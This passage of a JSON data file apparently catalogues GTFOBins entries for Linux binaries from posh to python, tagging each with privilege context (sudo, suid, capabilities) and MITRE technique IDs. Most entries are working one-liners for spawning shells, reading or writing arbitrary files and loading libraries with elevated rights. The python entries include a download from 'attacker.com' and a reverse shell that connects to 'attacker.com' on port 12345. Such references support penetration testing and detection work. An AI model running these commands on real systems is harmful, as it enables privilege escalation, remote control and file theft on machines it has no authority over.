context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:posh:shell:0:unprivileged","toolId":"gtfo:posh","toolName":"posh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"posh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/posh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pr:file-read:0:sudo","toolId":"gtfo:pr","toolName":"pr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pr -T /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pr:file-read:0:suid","toolId":"gtfo:pr","toolName":"pr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pr -T /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pr:file-read:0:unprivileged","toolId":"gtfo:pr","toolName":"pr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pr -T /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:procmail:command:0:sudo","toolId":"gtfo:procmail","toolName":"procmail","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo -e ':0\\n| /path/to/command >/path/to/temp-file\nprocmail -m /path/to/temp-file","description":"The program is picky about the file ownership, and waits for some input.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/procmail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:procmail:command:0:unprivileged","toolId":"gtfo:procmail","toolName":"procmail","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo -e ':0\\n| /path/to/command >/path/to/temp-file\nprocmail -m /path/to/temp-file","description":"The program is picky about the file ownership, and waits for some input.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/procmail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pry:inherit:0:sudo","toolId":"gtfo:pry","toolName":"pry","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"pry","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pry/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pry:inherit:0:unprivileged","toolId":"gtfo:pry","toolName":"pry","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"pry","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pry/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psftp:shell:0:sudo","toolId":"gtfo:psftp","toolName":"psftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psftp\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/psftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psftp:shell:0:suid","toolId":"gtfo:psftp","toolName":"psftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psftp\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/psftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psftp:shell:0:unprivileged","toolId":"gtfo:psftp","toolName":"psftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"psftp\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/psftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psql:inherit:0:sudo","toolId":"gtfo:psql","toolName":"psql","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"psql\n\\?","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/psql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psql:inherit:0:suid","toolId":"gtfo:psql","toolName":"psql","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"psql\n\\?","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/psql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psql:inherit:0:unprivileged","toolId":"gtfo:psql","toolName":"psql","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"psql\n\\?","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/psql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psql:shell:0:sudo","toolId":"gtfo:psql","toolName":"psql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psql\n\\! /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/psql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psql:shell:0:suid","toolId":"gtfo:psql","toolName":"psql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psql\n\\! /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/psql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psql:shell:0:unprivileged","toolId":"gtfo:psql","toolName":"psql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"psql\n\\! /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/psql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ptx:file-read:0:sudo","toolId":"gtfo:ptx","toolName":"ptx","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ptx -w 999 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ptx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ptx:file-read:0:suid","toolId":"gtfo:ptx","toolName":"ptx","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ptx -w 999 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ptx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ptx:file-read:0:unprivileged","toolId":"gtfo:ptx","toolName":"ptx","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ptx -w 999 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ptx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:puppet:file-read:0:sudo","toolId":"gtfo:puppet","toolName":"puppet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"puppet filebucket -l diff /dev/null /path/to/input-file","description":"The read file content is corrupted by the `diff` output format. The actual `diff` command is executed.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/puppet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:puppet:file-read:0:unprivileged","toolId":"gtfo:puppet","toolName":"puppet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"puppet filebucket -l diff /dev/null /path/to/input-file","description":"The read file content is corrupted by the `diff` output format. The actual `diff` command is executed.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/puppet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:puppet:file-write:0:sudo","toolId":"gtfo:puppet","toolName":"puppet","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"puppet apply -e 'file { \"/path/to/output-file\": content => \"DATA\" }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/puppet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:puppet:file-write:0:unprivileged","toolId":"gtfo:puppet","toolName":"puppet","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"puppet apply -e 'file { \"/path/to/output-file\": content => \"DATA\" }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/puppet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:puppet:shell:0:sudo","toolId":"gtfo:puppet","toolName":"puppet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"puppet apply -e \"exec { '/bin/sh <$(tty) >$(tty) 2>$(tty)': }\"","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/puppet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:puppet:shell:0:unprivileged","toolId":"gtfo:puppet","toolName":"puppet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"puppet apply -e \"exec { '/bin/sh <$(tty) >$(tty) 2>$(tty)': }\"","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/puppet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pwsh:file-write:0:sudo","toolId":"gtfo:pwsh","toolName":"pwsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"pwsh -c '\"DATA\" | Out-File /path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pwsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pwsh:file-write:0:unprivileged","toolId":"gtfo:pwsh","toolName":"pwsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"pwsh -c '\"DATA\" | Out-File /path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pwsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pwsh:shell:0:sudo","toolId":"gtfo:pwsh","toolName":"pwsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pwsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pwsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pwsh:shell:0:unprivileged","toolId":"gtfo:pwsh","toolName":"pwsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pwsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pwsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pygmentize:file-read:0:sudo","toolId":"gtfo:pygmentize","toolName":"pygmentize","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pygmentize -l text /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pygmentize/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pygmentize:file-read:0:unprivileged","toolId":"gtfo:pygmentize","toolName":"pygmentize","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pygmentize -l text /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pygmentize/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pyright:file-read:0:sudo","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pyright /path/to/input-file","description":"Content is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pyright/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pyright:file-read:0:unprivileged","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pyright /path/to/input-file","description":"Content is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pyright/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pyright:file-read:1:sudo","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pyright --outputjson /path/to/input-file","description":"Content is leaked as error messages in JSON format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pyright/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pyright:file-read:1:unprivileged","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pyright --outputjson /path/to/input-file","description":"Content is leaked as error messages in JSON format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pyright/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pyright:file-read:2:sudo","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pyright -w /path/to/input-dir/","description":"Recursively walks directories, parsing all Python files and leaking some contents through diagnostics.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pyright/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pyright:file-read:2:unprivileged","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pyright -w /path/to/input-dir/","description":"Recursively walks directories, parsing all Python files and leaking some contents through diagnostics.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pyright/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:download:0:sudo","toolId":"gtfo:python","toolName":"python","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"python -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:download:0:suid","toolId":"gtfo:python","toolName":"python","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"python -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:download:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"python -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:file-read:0:sudo","toolId":"gtfo:python","toolName":"python","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"python -c 'print(open(\"/path/to/input-file\").read())'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:file-read:0:suid","toolId":"gtfo:python","toolName":"python","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"python -c 'print(open(\"/path/to/input-file\").read())'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:file-read:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"python -c 'print(open(\"/path/to/input-file\").read())'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:file-write:0:sudo","toolId":"gtfo:python","toolName":"python","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"python -c 'open(\"/path/to/output-file\",\"w+\").write(\"DATA\")'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:file-write:0:suid","toolId":"gtfo:python","toolName":"python","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"python -c 'open(\"/path/to/output-file\",\"w+\").write(\"DATA\")'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:file-write:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"python -c 'open(\"/path/to/output-file\",\"w+\").write(\"DATA\")'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:library-load:0:capabilities","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:library-load:0:sudo","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:library-load:0:suid","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:library-load:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:reverse-shell:0:sudo","toolId":"gtfo:python","toolName":"python","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"python -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"attacker.com\",12345))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:reverse-shell:0:suid","toolId":"gtfo:python","toolName":"python","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"python -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"attacker.com\",12345))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:reverse-shell:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"python -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"attacker.com\",12345))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution 